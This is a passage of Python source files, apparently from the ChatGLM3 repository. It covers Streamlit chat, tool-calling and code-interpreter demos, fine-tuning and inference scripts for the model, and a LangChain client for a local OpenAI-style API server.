= '' for response in client.generate_stream( system=None, tools=tools, history=history, do_sample=True, max_new_tokens=max_new_tokens, temperature=temperature, top_p=top_p, stop_sequences=[str(r) for r in (Role.USER, Role.OBSERVATION)], repetition_penalty=repetition_penalty, ): token = response.token if response.token.special: print("\n==Output:==\n", output_text) match token.text.strip(): case '<|user|>': append_conversation(Conversation( Role.ASSISTANT, postprocess_text(output_text), ), history, markdown_placeholder) return # Initiate tool call case '<|assistant|>': append_conversation(Conversation( Role.ASSISTANT, postprocess_text(output_text), ), history, markdown_placeholder) output_text = '' message_placeholder = placeholder.chat_message(name="tool", avatar="assistant") markdown_placeholder = message_placeholder.empty() continue case '<|observation|>': tool, *call_args_text = output_text.strip().split('\n') call_args_text = '\n'.join(call_args_text) append_conversation(Conversation( Role.TOOL, postprocess_text(output_text), tool, ), history, markdown_placeholder) message_placeholder = placeholder.chat_message(name="observation", avatar="user") markdown_placeholder = message_placeholder.empty() try: code = extract_code(call_args_text) args = eval(code, {'tool_call': tool_call}, {}) except: st.error('Failed to parse tool call') return output_text = '' if manual_mode: st.info('Please provide tool call results below:') return else: with markdown_placeholder: with st.spinner(f'Calling tool {tool}...'): observation = dispatch_tool(tool, args) if len(observation) > truncate_length: observation = observation[:truncate_length] + ' [TRUNCATED]' append_conversation(Conversation( Role.OBSERVATION, observation ), history, markdown_placeholder) message_placeholder = placeholder.chat_message(name="assistant", avatar="assistant") markdown_placeholder = message_placeholder.empty() st.session_state.calling_tool = False break case _: st.error(f'Unexpected special token: {token.text.strip()}') return output_text += response.token.text markdown_placeholder.markdown(postprocess_text(output_text + '▌')) else: append_conversation(Conversation( Role.ASSISTANT, postprocess_text(output_text), ), history, markdown_placeholder) return File: composite_demo/demo_ci.py import base64 from io import BytesIO import os from pprint import pprint import queue import re from subprocess import PIPE import jupyter_client from PIL import Image import streamlit as st from streamlit.delta_generator import DeltaGenerator from client import get_client from conversation import postprocess_text, preprocess_text, Conversation, Role IPYKERNEL = os.environ.get('IPYKERNEL', 'chatglm3-demo') SYSTEM_PROMPT = '你是一位智能AI助手,你叫ChatGLM,你连接着一台电脑,但请注意不能联网。在使用Python解决任务时,你可以运行代码并得到结果,如果运行结果有错误,你需要尽可能对代码进行改进。你可以处理用户上传到电脑上的文件,文件默认存储路径是/mnt/data/。' client = get_client() class CodeKernel(object): def __init__(self, kernel_name='kernel', kernel_id=None, kernel_config_path="", python_path=None, ipython_path=None, init_file_path="./startup.py", verbose=1): self.kernel_name = kernel_name self.kernel_id = kernel_id self.kernel_config_path = kernel_config_path self.python_path = python_path self.ipython_path = ipython_path self.init_file_path = init_file_path self.verbose = verbose if python_path is None and ipython_path is None: env = None else: env = {"PATH": self.python_path + ":$PATH", "PYTHONPATH": self.python_path} # Initialize the backend kernel self.kernel_manager = jupyter_client.KernelManager(kernel_name=IPYKERNEL, connection_file=self.kernel_config_path, exec_files=[self.init_file_path], env=env) if self.kernel_config_path: self.kernel_manager.load_connection_file() self.kernel_manager.start_kernel(stdout=PIPE, stderr=PIPE) print("Backend kernel started with the configuration: {}".format( self.kernel_config_path)) else: self.kernel_manager.start_kernel(stdout=PIPE, stderr=PIPE) print("Backend kernel started with the configuration: {}".format( self.kernel_manager.connection_file)) if verbose: pprint(self.kernel_manager.get_connection_info()) # Initialize the code kernel self.kernel = self.kernel_manager.blocking_client() # self.kernel.load_connection_file() self.kernel.start_channels() print("Code kernel started.") def execute(self, code): self.kernel.execute(code) try: shell_msg = self.kernel.get_shell_msg(timeout=30) io_msg_content = self.kernel.get_iopub_msg(timeout=30)['content'] while True: msg_out = io_msg_content ### Poll the message try: io_msg_content = self.kernel.get_iopub_msg(timeout=30)['content'] if 'execution_state' in io_msg_content and io_msg_content['execution_state'] == 'idle': break except queue.Empty: break return shell_msg, msg_out except Exception as e: print(e) return None def execute_interactive(self, code, verbose=False): shell_msg = self.kernel.execute_interactive(code) if shell_msg is queue.Empty: if verbose: print("Timeout waiting for shell message.") self.check_msg(shell_msg, verbose=verbose) return shell_msg def inspect(self, code, verbose=False): msg_id = self.kernel.inspect(code) shell_msg = self.kernel.get_shell_msg(timeout=30) if shell_msg is queue.Empty: if verbose: print("Timeout waiting for shell message.") self.check_msg(shell_msg, verbose=verbose) return shell_msg def get_error_msg(self, msg, verbose=False) -> str | None: if msg['content']['status'] == 'error': try: error_msg = msg['content']['traceback'] except: try: error_msg = msg['content']['traceback'][-1].strip() except: error_msg = "Traceback Error" if verbose: print("Error: ", error_msg) return error_msg return None def check_msg(self, msg, verbose=False): status = msg['content']['status'] if status == 'ok': if verbose: print("Execution succeeded.") elif status == 'error': for line in msg['content']['traceback']: if verbose: print(line) def shutdown(self): # Shutdown the backend kernel self.kernel_manager.shutdown_kernel() print("Backend kernel shutdown.") # Shutdown the code kernel self.kernel.shutdown() print("Code kernel shutdown.") def restart(self): # Restart the backend kernel self.kernel_manager.restart_kernel() # print("Backend kernel restarted.") def interrupt(self): # Interrupt the backend kernel self.kernel_manager.interrupt_kernel() # print("Backend kernel interrupted.") def is_alive(self): return self.kernel.is_alive() def b64_2_img(data): buff = BytesIO(base64.b64decode(data)) return Image.open(buff) def clean_ansi_codes(input_string): ansi_escape = re.compile(r'(\x9B|\x1B\[|\u001b\[)[0-?]*[ -/]*[@-~]') return ansi_escape.sub('', input_string) def execute(code, kernel: CodeKernel) -> tuple[str, str | Image.Image]: res = "" res_type = None code = code.replace("<|observation|>", "") code = code.replace("<|assistant|>interpreter", "") code = code.replace("<|assistant|>", "") code = code.replace("<|user|>", "") code = code.replace("<|system|>", "") msg, output = kernel.execute(code) if msg['metadata']['status'] == "timeout": return res_type, 'Timed out' elif msg['metadata']['status'] == 'error': return res_type, clean_ansi_codes('\n'.join(kernel.get_error_msg(msg, verbose=True))) if 'text' in output: res_type = "text" res = output['text'] elif 'data' in output: for key in output['data']: if 'text/plain' in key: res_type = "text" res = output['data'][key] elif 'image/png' in key: res_type = "image" res = output['data'][key] break if res_type == "image": return res_type, b64_2_img(res) elif res_type == "text" or res_type == "traceback": res = res return res_type, res @st.cache_resource def get_kernel(): kernel = CodeKernel() return kernel def extract_code(text: str) -> str: pattern = r'```([^\n]*)\n(.*?)```' matches = re.findall(pattern, text, re.DOTALL) return matches[-1][1] # Append a conversation into history, while show it in a new markdown block def append_conversation( conversation: Conversation, history: list[Conversation], placeholder: DeltaGenerator | None = None, ) -> None: history.append(conversation) conversation.show(placeholder) def main( prompt_text: str, top_p: float = 0.2, temperature: float = 0.1, repetition_penalty: float = 1.1, max_new_tokens: int = 1024, truncate_length: int = 1024, retry: bool = False ): if 'ci_history' not in st.session_state: st.session_state.ci_history = [] if prompt_text == "" and retry == False: print("\n== Clean ==\n") st.session_state.chat_history = [] return history: list[Conversation] = st.session_state.chat_history for conversation in history: conversation.show() if retry: print("\n== Retry ==\n") last_user_conversation_idx = None for idx, conversation in enumerate(history): if conversation.role == Role.USER: last_user_conversation_idx = idx if last_user_conversation_idx is not None: prompt_text = history[last_user_conversation_idx].content del history[last_user_conversation_idx:] if prompt_text: prompt_text = prompt_text.strip() role = Role.USER append_conversation(Conversation(role, prompt_text), history) placeholder = st.container() message_placeholder = placeholder.chat_message(name="assistant", avatar="assistant") markdown_placeholder = message_placeholder.empty() for _ in range(5): output_text = '' for response in client.generate_stream( system=SYSTEM_PROMPT, tools=None, history=history, do_sample=True, max_new_token=max_new_tokens, temperature=temperature, top_p=top_p, stop_sequences=[str(r) for r in (Role.USER, Role.OBSERVATION)], repetition_penalty=repetition_penalty, ): token = response.token if response.token.special: print("\n==Output:==\n", output_text) match token.text.strip(): case '<|user|>': append_conversation(Conversation( Role.ASSISTANT, postprocess_text(output_text), ), history, markdown_placeholder) return # Initiate tool call case '<|assistant|>': append_conversation(Conversation( Role.ASSISTANT, postprocess_text(output_text), ), history, markdown_placeholder) message_placeholder = placeholder.chat_message(name="interpreter", avatar="assistant") markdown_placeholder = message_placeholder.empty() output_text = '' continue case '<|observation|>': code = extract_code(output_text) display_text = output_text.split('interpreter')[-1].strip() append_conversation(Conversation( Role.INTERPRETER, postprocess_text(display_text), ), history, markdown_placeholder) message_placeholder = placeholder.chat_message(name="observation", avatar="user") markdown_placeholder = message_placeholder.empty() output_text = '' with markdown_placeholder: with st.spinner('Executing code...'): try: res_type, res = execute(code, get_kernel()) except Exception as e: st.error(f'Error when executing code: {e}') return print("Received:", res_type, res) if truncate_length: if res_type == 'text' and len(res) > truncate_length: res = res[:truncate_length] + ' [TRUNCATED]' append_conversation(Conversation( Role.OBSERVATION, '[Image]' if res_type == 'image' else postprocess_text(res), tool=None, image=res if res_type == 'image' else None, ), history, markdown_placeholder) message_placeholder = placeholder.chat_message(name="assistant", avatar="assistant") markdown_placeholder = message_placeholder.empty() output_text = '' break case _: st.error(f'Unexpected special token: {token.text.strip()}') break output_text += response.token.text display_text = output_text.split('interpreter')[-1].strip() markdown_placeholder.markdown(postprocess_text(display_text + '▌')) else: append_conversation(Conversation( Role.ASSISTANT, postprocess_text(output_text), ), history, markdown_placeholder) return else: st.session_state.chat_history = [] File: composite_demo/main.py import streamlit as st st.set_page_config( page_title="ChatGLM3 Demo", page_icon=":robot:", layout='centered', initial_sidebar_state='expanded', ) import demo_chat, demo_ci, demo_tool from enum import Enum DEFAULT_SYSTEM_PROMPT = ''' You are ChatGLM3, a large language model trained by Zhipu.AI. Follow the user's instructions carefully. Respond using markdown. '''.strip() # Set the title of the demo st.title("ChatGLM3 Demo") # Add your custom text here, with smaller font size st.markdown( "<sub>智谱AI 公开在线技术文档: https://lslfd0slxc.feishu.cn/wiki/WvQbwIJ9tiPAxGk8ywDck6yfnof </sub> \n\n <sub> 更多 ChatGLM3-6B 的使用方法请参考文档。</sub>", unsafe_allow_html=True) class Mode(str, Enum): CHAT, TOOL, CI = '💬 Chat', '🛠️ Tool', '🧑‍💻 Code Interpreter' with st.sidebar: top_p = st.slider( 'top_p', 0.0, 1.0, 0.8, step=0.01 ) temperature = st.slider( 'temperature', 0.0, 1.5, 0.95, step=0.01 ) repetition_penalty = st.slider( 'repetition_penalty', 0.0, 2.0, 1.1, step=0.01 ) max_new_token = st.slider( 'Output length', 5, 32000, 256, step=1 ) cols = st.columns(2) export_btn = cols[0] clear_history = cols[1].button("Clear History", use_container_width=True) retry = export_btn.button("Retry", use_container_width=True) system_prompt = st.text_area( label="System Prompt (Only for chat mode)", height=300, value=DEFAULT_SYSTEM_PROMPT, ) prompt_text = st.chat_input( 'Chat with ChatGLM3!', key='chat_input', ) tab = st.radio( 'Mode', [mode.value for mode in Mode], horizontal=True, label_visibility='hidden', ) if clear_history or retry: prompt_text = "" match tab: case Mode.CHAT: demo_chat.main( retry=retry, top_p=top_p, temperature=temperature, prompt_text=prompt_text, system_prompt=system_prompt, repetition_penalty=repetition_penalty, max_new_tokens=max_new_token ) case Mode.TOOL: demo_tool.main( retry=retry, top_p=top_p, temperature=temperature, prompt_text=prompt_text, repetition_penalty=repetition_penalty, max_new_tokens=max_new_token, truncate_length=1024) case Mode.CI: demo_ci.main( retry=retry, top_p=top_p, temperature=temperature, prompt_text=prompt_text, repetition_penalty=repetition_penalty, max_new_tokens=max_new_token, truncate_length=1024) case _: st.error(f'Unexpected tab: {tab}') File: composite_demo/demo_chat.py import streamlit as st from streamlit.delta_generator import DeltaGenerator from client import get_client from conversation import postprocess_text, preprocess_text, Conversation, Role client = get_client() # Append a conversation into history, while show it in a new markdown block def append_conversation( conversation: Conversation, history: list[Conversation], placeholder: DeltaGenerator | None = None, ) -> None: history.append(conversation) conversation.show(placeholder) def main( prompt_text: str, system_prompt: str, top_p: float = 0.8, temperature: float = 0.95, repetition_penalty: float = 1.0, max_new_tokens: int = 1024, retry: bool = False ): placeholder = st.empty() with placeholder.container(): if 'chat_history' not in st.session_state: st.session_state.chat_history = [] if prompt_text == "" and retry == False: print("\n== Clean ==\n") st.session_state.chat_history = [] return history: list[Conversation] = st.session_state.chat_history for conversation in history: conversation.show() if retry: print("\n== Retry ==\n") last_user_conversation_idx = None for idx, conversation in enumerate(history): if conversation.role == Role.USER: last_user_conversation_idx = idx if last_user_conversation_idx is not None: prompt_text = history[last_user_conversation_idx].content del history[last_user_conversation_idx:] if prompt_text: prompt_text = prompt_text.strip() append_conversation(Conversation(Role.USER, prompt_text), history) placeholder = st.empty() message_placeholder = placeholder.chat_message(name="assistant", avatar="assistant") markdown_placeholder = message_placeholder.empty() output_text = '' for response in client.generate_stream( system_prompt, tools=None, history=history, do_sample=True, max_new_tokens=max_new_tokens, temperature=temperature, top_p=top_p, stop_sequences=[str(Role.USER)], repetition_penalty=repetition_penalty, ): token = response.token if response.token.special: print("\n==Output:==\n", output_text) match token.text.strip(): case '<|user|>': break case _: st.error(f'Unexpected special token: {token.text.strip()}') break output_text += response.token.text markdown_placeholder.markdown(postprocess_text(output_text + '▌')) append_conversation(Conversation( Role.ASSISTANT, postprocess_text(output_text), ), history, markdown_placeholder) File: finetune_demo/finetune_hf.py # -*- coding: utf-8 -*- import os import jieba import dataclasses as dc import functools from collections.abc import Callable, Mapping, Sequence from pathlib import Path from typing import Annotated, Any, Optional, Union import numpy as np import ruamel.yaml as yaml import torch import typer from datasets import Dataset, DatasetDict, NamedSplit, Split, load_dataset from nltk.translate.bleu_score import SmoothingFunction, sentence_bleu from peft import ( PeftConfig, PeftModelForCausalLM, get_peft_config, get_peft_model ) from rouge_chinese import Rouge from torch import nn from transformers import ( AutoModelForCausalLM, AutoTokenizer, EvalPrediction, GenerationConfig, PreTrainedModel, PreTrainedTokenizer, PreTrainedTokenizerFast, Seq2SeqTrainingArguments, AutoConfig, ) from transformers import DataCollatorForSeq2Seq as _DataCollatorForSeq2Seq from transformers import Seq2SeqTrainer as _Seq2SeqTrainer ModelType = Union[PreTrainedModel, PeftModelForCausalLM] TokenizerType = Union[PreTrainedTokenizer, PreTrainedTokenizerFast] app = typer.Typer(pretty_exceptions_show_locals=False) class DataCollatorForSeq2Seq(_DataCollatorForSeq2Seq): def __call__(self, features, return_tensors=None): output_ids = ( [feature['output_ids'] for feature in features] if 'output_ids' in features[0].keys() else None ) if output_ids is not None: max_output_length = max(len(out) for out in output_ids) if self.pad_to_multiple_of is not None: max_output_length = ( ( max_output_length + self.pad_to_multiple_of - 1) // self.pad_to_multiple_of * self.pad_to_multiple_of ) for feature in features: remainder = [self.tokenizer.pad_token_id] * ( max_output_length - len(feature['output_ids']) ) if isinstance(feature['output_ids'], list): feature['output_ids'] = feature['output_ids'] + remainder else: feature['output_ids'] = np.concatenate( [feature['output_ids'], remainder] ).astype(np.int64) return super().__call__(features, return_tensors) class Seq2SeqTrainer(_Seq2SeqTrainer): def prediction_step( self, model: nn.Module, inputs: dict[str, Any], prediction_loss_only: bool, ignore_keys=None, **gen_kwargs, ) -> tuple[Optional[float], Optional[torch.Tensor], Optional[torch.Tensor]]: if self.args.predict_with_generate: output_ids = inputs.pop('output_ids') input_ids = inputs['input_ids'] loss, generated_tokens, labels = super().prediction_step( model, inputs, prediction_loss_only, ignore_keys, **gen_kwargs ) generated_tokens = generated_tokens[:, input_ids.size()[1]:] if self.args.predict_with_generate: labels = output_ids return loss, generated_tokens, labels # For P-Tuning a new save_model function is fine for the prefix_encoder model # but may cost problems for the whole model loading # def save_model(self, output_dir: Optional[str] = None, _internal_call: bool = False): # if output_dir is None: # output_dir = self.args.output_dir # os.makedirs(output_dir, exist_ok=True) # ptuning_params = {k: v for k, v in self.model.transformer.prefix_encoder.state_dict().items()} # # torch.save(ptuning_params, os.path.join(output_dir, 'pytorch_model.bin')) # # print(f"P-Tuning model weights saved in {output_dir}") # # if self.tokenizer is not None: # self.tokenizer.save_pretrained(output_dir) def _resolve_path(path: Union[str, Path]) -> Path: return Path(path).expanduser().resolve() def _sanity_check( input_ids: Sequence[int], output_ids: Sequence[int], tokenizer: PreTrainedTokenizer, ): print('--> Sanity check') for in_id, out_id in zip(input_ids, output_ids): if in_id == 0: continue if in_id in tokenizer.tokenizer.index_special_tokens: in_text = tokenizer.tokenizer.index_special_tokens[in_id] else: in_text = tokenizer.decode([in_id]) print(f'{repr(in_text):>20}: {in_id} -> {out_id}') @functools.cache def _get_yaml_parser() -> yaml.YAML: parser = yaml.YAML(typ='safe', pure=True) parser.indent(mapping=2, offset=2, sequence=4) parser.default_flow_style = False return parser @dc.dataclass class DataConfig(object): train_file: str val_file: Optional[str] = None test_file: Optional[str] = None num_proc: Optional[int] = None @property def data_format(self) -> str: return Path(self.train_file).suffix @property def data_files(self) -> dict[NamedSplit, str]: return { split: data_file for split, data_file in zip( [Split.TRAIN, Split.VALIDATION, Split.TEST], [self.train_file, self.val_file, self.test_file], ) if data_file is not None } @dc.dataclass class FinetuningConfig(object): data_config: DataConfig max_input_length: int max_output_length: int training_args: Seq2SeqTrainingArguments = dc.field( default_factory=lambda: Seq2SeqTrainingArguments(output_dir='./output') ) peft_config: Optional[PeftConfig] = None def __post_init__(self): if not self.training_args.do_eval or self.data_config.val_file is None: # skips the evaluation stage when `do_eval` or `eval_file` is not provided self.training_args.do_eval = False self.training_args.evaluation_strategy = 'no' self.data_config.val_file = None else: self.training_args.per_device_eval_batch_size = ( self.training_args.per_device_eval_batch_size or self.training_args.per_device_train_batch_size ) @classmethod def from_dict(cls, **kwargs) -> 'FinetuningConfig': training_args = kwargs.get('training_args', None) if training_args is not None and not isinstance( training_args, Seq2SeqTrainingArguments ): gen_config = training_args.get('generation_config') # TODO: a bit hacky if not isinstance(gen_config, GenerationConfig): training_args['generation_config'] = GenerationConfig( **gen_config ) kwargs['training_args'] = Seq2SeqTrainingArguments(**training_args) data_config = kwargs.get('data_config') if not isinstance(data_config, DataConfig): kwargs['data_config'] = DataConfig(**data_config) peft_config = kwargs.get('peft_config', None) if peft_config is not None and not isinstance(peft_config, PeftConfig): kwargs['peft_config'] = get_peft_config(peft_config) return cls(**kwargs) @classmethod def from_file(cls, path: Union[str, Path]) -> 'FinetuningConfig': path = _resolve_path(path) kwargs = _get_yaml_parser().load(path) return cls.from_dict(**kwargs) def _load_datasets( data_dir: Path, data_format: str, data_files: dict[NamedSplit, str], num_proc: Optional[int], ) -> DatasetDict: if data_format in ('.csv', '.json', '.jsonl'): dataset_dct = load_dataset( data_format[1:], data_dir=data_dir, data_files=data_files, num_proc=num_proc, ) else: err_msg = f"Cannot load dataset in the '{data_format}' format." raise NotImplementedError(err_msg) return dataset_dct class DataManager(object): def __init__(self, data_dir: str, data_config: DataConfig): self._num_proc = data_config.num_proc self._dataset_dct = _load_datasets( _resolve_path(data_dir), data_config.data_format, data_config.data_files, self._num_proc, ) def _get_dataset(self, split: NamedSplit) -> Optional[Dataset]: return self._dataset_dct.get(split, None) def get_dataset( self, split: NamedSplit, process_fn: Callable[[dict[str, Any]], dict[str, Any]], batched: bool = True, remove_orig_columns: bool = True, ) -> Optional[Dataset]: orig_dataset = self._get_dataset(split) if orig_dataset is None: return if remove_orig_columns: remove_columns = orig_dataset.column_names else: remove_columns = None return orig_dataset.map( process_fn, batched=batched, remove_columns=remove_columns, num_proc=self._num_proc, ) def print_model_size(model: PreTrainedModel): print("--> Model") total_params = sum(p.numel() for p in model.parameters() if p.requires_grad) print(f"\n--> model has {total_params / 1e6}M params\n") def process_batch( batch: Mapping[str, Sequence], tokenizer: PreTrainedTokenizer, max_input_length: int, max_output_length: int, ) -> dict[str, list]: batched_tools = batch.get('tools', None) batched_conv = batch['conversations'] batched_input_ids = [] batched_labels = [] if batched_tools is None: batched_tools = [None] * len(batched_conv) for tools, conv in zip(batched_tools, batched_conv): input_ids, loss_masks = [ tokenizer.get_command('[gMASK]'), tokenizer.get_command('sop'), ], [False, False] if tools is not None: raise NotImplementedError() for message in conv: if message['role'] in ('system', 'user'): loss_mask_val = False else: loss_mask_val = True if message['role'] == 'tool': raise NotImplementedError() else: new_input_ids = tokenizer.build_single_message( message['role'], '', message['content'] ) new_loss_masks = [loss_mask_val] * len(new_input_ids) input_ids += new_input_ids loss_masks += new_loss_masks input_ids.append(tokenizer.eos_token_id) loss_masks = [False, *loss_masks] labels = [] for input_id, mask in zip(input_ids, loss_masks): if mask: labels.append(input_id) else: labels.append(-100) max_length = max_input_length + max_output_length + 1 batched_input_ids.append(input_ids[:max_length]) batched_labels.append(labels[:max_length]) return {'input_ids': batched_input_ids, 'labels': batched_labels} def process_batch_eval( batch: Mapping[str, Sequence], tokenizer: PreTrainedTokenizer, max_input_length: int, max_output_length: int, ) -> dict[str, list]: batched_tools = batch.get('tools', None) batched_conv = batch['conversations'] batched_input_ids = [] # To avoid computing loss, we do not provide the `labels` field in the input dictionary. batched_output_ids = [] if batched_tools is None: batched_tools = [None] * len(batched_conv) for tools, conv in zip(batched_tools, batched_conv): input_ids = [ tokenizer.get_command('[gMASK]'), tokenizer.get_command('sop'), ] if tools is not None: raise NotImplementedError() for message in conv: if len(input_ids) >= max_input_length: break if message['role'] == 'tool': raise NotImplementedError() else: new_input_ids = tokenizer.build_single_message( message['role'], '', message['content'] ) if message['role'] == 'assistant': output_prompt, output_ids = ( new_input_ids[:1], new_input_ids[1:], ) output_ids.append(tokenizer.eos_token_id) batched_input_ids.append( input_ids[:max_input_length] + output_prompt[:1] ) batched_output_ids.append(output_ids[:max_output_length]) input_ids += new_input_ids return {'input_ids': batched_input_ids, 'output_ids': batched_output_ids} # Not sure if this is necessary, can set it to half. # If train with cpu, cast all params to fp32 instead of trainable ones. def _prepare_model_for_training(model: nn.Module, use_cpu: bool): for param in model.parameters(): if param.requires_grad or use_cpu: param.data = param.data.to(torch.float32) def load_tokenizer_and_model( model_dir: str, peft_config: Optional[PeftConfig] = None, ) -> tuple[PreTrainedTokenizer, nn.Module]: tokenizer = AutoTokenizer.from_pretrained(model_dir, trust_remote_code=True) if peft_config is not None: if peft_config.peft_type.name == "PREFIX_TUNING": config = AutoConfig.from_pretrained(model_dir, trust_remote_code=True) config.pre_seq_len = peft_config.num_virtual_tokens config.use_cache = False model = AutoModelForCausalLM.from_pretrained( model_dir, trust_remote_code=True, config=config, ) if peft_config.peft_type.name == "LORA": model = AutoModelForCausalLM.from_pretrained( model_dir, trust_remote_code=True, empty_init=False, use_cache=False ) model = get_peft_model(model, peft_config) model.print_trainable_parameters() else: model = AutoModelForCausalLM.from_pretrained( model_dir, trust_remote_code=True, empty_init=False, use_cache=False ) print_model_size(model) return tokenizer, model def compute_metrics(eval_preds: EvalPrediction, tokenizer: PreTrainedTokenizer): batched_pred_ids, batched_label_ids = eval_preds metrics_dct = {'rouge-1': [], 'rouge-2': [], 'rouge-l': [], 'bleu-4': []} for pred_ids, label_ids in zip(batched_pred_ids, batched_label_ids): pred_txt = tokenizer.decode(pred_ids).strip() label_txt = tokenizer.decode(label_ids).strip() pred_tokens = list(jieba.cut(pred_txt)) label_tokens = list(jieba.cut(label_txt)) rouge = Rouge() scores = rouge.get_scores(' '.join(pred_tokens), ' '.join(label_tokens)) for k, v in scores[0].items(): metrics_dct[k].append(round(v['f'] * 100, 4)) metrics_dct['bleu-4'].append( sentence_bleu( [label_tokens], pred_tokens, smoothing_function=SmoothingFunction().method3, ) ) return {k: np.mean(v) for k, v in metrics_dct.items()} @app.command() def main( data_dir: Annotated[str, typer.Argument(help='')], model_dir: Annotated[ str, typer.Argument( help='A string that specifies the model id of a pretrained model configuration hosted on huggingface.co, or a path to a directory containing a model configuration file.' ), ], config_file: Annotated[str, typer.Argument(help='')], auto_resume_from_checkpoint: str = typer.Argument( default='', help='If entered as yes, automatically use the latest save checkpoint. If it is a numerical example 12 15, use the corresponding save checkpoint. If the input is no, restart training' ), ): ft_config = FinetuningConfig.from_file(config_file) tokenizer, model = load_tokenizer_and_model(model_dir, peft_config=ft_config.peft_config) data_manager = DataManager(data_dir, ft_config.data_config) train_dataset = data_manager.get_dataset( Split.TRAIN, functools.partial( process_batch, tokenizer=tokenizer, max_input_length=ft_config.max_input_length, max_output_length=ft_config.max_output_length, ), batched=True, ) print('train_dataset:', train_dataset) val_dataset = data_manager.get_dataset( Split.VALIDATION, functools.partial( process_batch_eval, tokenizer=tokenizer, max_input_length=ft_config.max_input_length, max_output_length=ft_config.max_output_length, ), batched=True, ) if val_dataset is not None: print('val_dataset:', val_dataset) test_dataset = data_manager.get_dataset( Split.TEST, functools.partial( process_batch_eval, tokenizer=tokenizer, max_input_length=ft_config.max_input_length, max_output_length=ft_config.max_output_length, ), batched=True, ) if test_dataset is not None: print('test_dataset:', test_dataset) # checks encoded dataset _sanity_check( train_dataset[0]["input_ids"], train_dataset[0]["labels"], tokenizer ) # turn model to fp32 _prepare_model_for_training(model, ft_config.training_args.use_cpu) ft_config.training_args.generation_config.pad_token_id = ( tokenizer.pad_token_id ) ft_config.training_args.generation_config.eos_token_id = [ tokenizer.eos_token_id, tokenizer.get_command('<|user|>'), tokenizer.get_command('<|observation|>'), ] model.gradient_checkpointing_enable() model.enable_input_require_grads() use_tokenizer = True if ft_config.peft_config is not None: use_tokenizer = False if ft_config.peft_config.peft_type == "LORA" else True trainer = Seq2SeqTrainer( model=model, args=ft_config.training_args, data_collator=DataCollatorForSeq2Seq( tokenizer=tokenizer, padding='longest', return_tensors='pt', ), train_dataset=train_dataset, eval_dataset=val_dataset.select(list(range(50))), tokenizer=tokenizer if use_tokenizer else None, # LORA does not need tokenizer compute_metrics=functools.partial(compute_metrics, tokenizer=tokenizer), ) if auto_resume_from_checkpoint.upper() == "" or auto_resume_from_checkpoint is None: trainer.train() else: def do_rf_checkpoint(sn): model.gradient_checkpointing_enable() model.enable_input_require_grads() checkpoint_directory = os.path.join(output_dir, "checkpoint-" + sn) print("resume checkpoint from checkpoint-" + sn) trainer.train(resume_from_checkpoint=checkpoint_directory) output_dir = ft_config.training_args.output_dir # resume from latest checkpoint if auto_resume_from_checkpoint.upper() == "YES": dirlist = os.listdir(output_dir) checkpoint_sn = 0 # get latest checkpoint for checkpoint_str in dirlist: if checkpoint_str.find("eckpoint") > 0 and checkpoint_str.find("tmp") == -1: checkpoint = int(checkpoint_str.replace("checkpoint-", "")) if checkpoint > checkpoint_sn: checkpoint_sn = checkpoint if checkpoint_sn > 0: do_rf_checkpoint(str(checkpoint_sn)) else: trainer.train() else: # resume from specific checkpoint if auto_resume_from_checkpoint.isdigit() and int(auto_resume_from_checkpoint) > 0: do_rf_checkpoint(auto_resume_from_checkpoint) else: print(auto_resume_from_checkpoint, "The specified checkpoint sn(" + auto_resume_from_checkpoint + ") has not been saved. Please search for the correct chkeckpoint in the model output directory") # test stage if test_dataset is not None: trainer.predict(test_dataset) if __name__ == '__main__': app() File: finetune_demo/inference_hf.py #!/usr/bin/env python # -*- coding: utf-8 -*- from pathlib import Path from typing import Annotated, Union import typer from peft import AutoPeftModelForCausalLM, PeftModelForCausalLM from transformers import ( AutoModelForCausalLM, AutoTokenizer, PreTrainedModel, PreTrainedTokenizer, PreTrainedTokenizerFast, ) ModelType = Union[PreTrainedModel, PeftModelForCausalLM] TokenizerType = Union[PreTrainedTokenizer, PreTrainedTokenizerFast] app = typer.Typer(pretty_exceptions_show_locals=False) def _resolve_path(path: Union[str, Path]) -> Path: return Path(path).expanduser().resolve() def load_model_and_tokenizer(model_dir: Union[str, Path]) -> tuple[ModelType, TokenizerType]: model_dir = _resolve_path(model_dir) if (model_dir / 'adapter_config.json').exists(): model = AutoPeftModelForCausalLM.from_pretrained( model_dir, trust_remote_code=True, device_map='auto' ) tokenizer_dir = model.peft_config['default'].base_model_name_or_path else: model = AutoModelForCausalLM.from_pretrained( model_dir, trust_remote_code=True, device_map='auto' ) tokenizer_dir = model_dir tokenizer = AutoTokenizer.from_pretrained( tokenizer_dir, trust_remote_code=True ) return model, tokenizer @app.command() def main( model_dir: Annotated[str, typer.Argument(help='')], prompt: Annotated[str, typer.Option(help='')], ): model, tokenizer = load_model_and_tokenizer(model_dir) response, _ = model.chat(tokenizer, prompt) print(response) if __name__ == '__main__': app() File: openai_api_demo/langchain_openai_api.py """ This script is designed for interacting with a local GLM3 AI model using the `ChatGLM3` class from the `langchain_community` library. It facilitates continuous dialogue with the GLM3 model. 1. Start the Local Model Service: Before running this script, you need to execute the `api_server.py` script to start the GLM3 model's service. 2. Run the Script: The script includes functionality for initializing the LLMChain object and obtaining AI responses, allowing the user to input questions and receive AI answers. 3. This demo is not support for streaming. """ from langchain.schema.messages import HumanMessage, SystemMessage, AIMessage from langchain_community.llms.chatglm3 import ChatGLM3 def get_ai_response(messages, user_input): endpoint_url = "http://127.0.0.1:8000/v1/chat/completions" llm = ChatGLM3( endpoint_url=endpoint_url, max_tokens=4096, prefix_messages=messages, top_p=0.9 ) ai_response = llm.invoke(user_input) return ai_response def continuous_conversation(): messages = [ SystemMessage(content="You are an intelligent AI assistant, named ChatGLM3."), ] while True: user_input = input("Human (or 'exit' to quit): ") if user_input.lower() == 'exit': break ai_response = get_ai_response(messages, user_input) print("ChatGLM3: ", ai_response) messages += [ HumanMessage(content=user_input), AIMessage(content=ai_response), ] if __name__ == "__main__": continuous_conversation() File: openai_api_demo/api_server.py """ This script implements an API for the ChatGLM3-6B model, formatted similarly to OpenAI's API (https://platform.openai.com/docs/api-reference/chat). It's designed to be run as a web server using FastAPI and uvicorn, making the ChatGLM3-6B model accessible through OpenAI Client. Key Components and Features: - Model and Tokenizer Setup: Configures the model and tokenizer paths and loads them. - FastAPI Configuration: Sets up a FastAPI application with CORS middleware for handling cross-origin requests. - API Endpoints: - "/v1/models": Lists the available models, specifically ChatGLM3-6B. - "/v1/chat/completions": Processes chat completion requests with options for streaming and regular responses. - "/v1/embeddings": Processes Embedding request of a list of text inputs. - Token Limit Caution: In the OpenAI API, 'max_tokens' is equivalent to HuggingFace's 'max_new_tokens', not 'max_length'. For instance, setting 'max_tokens' to 8192 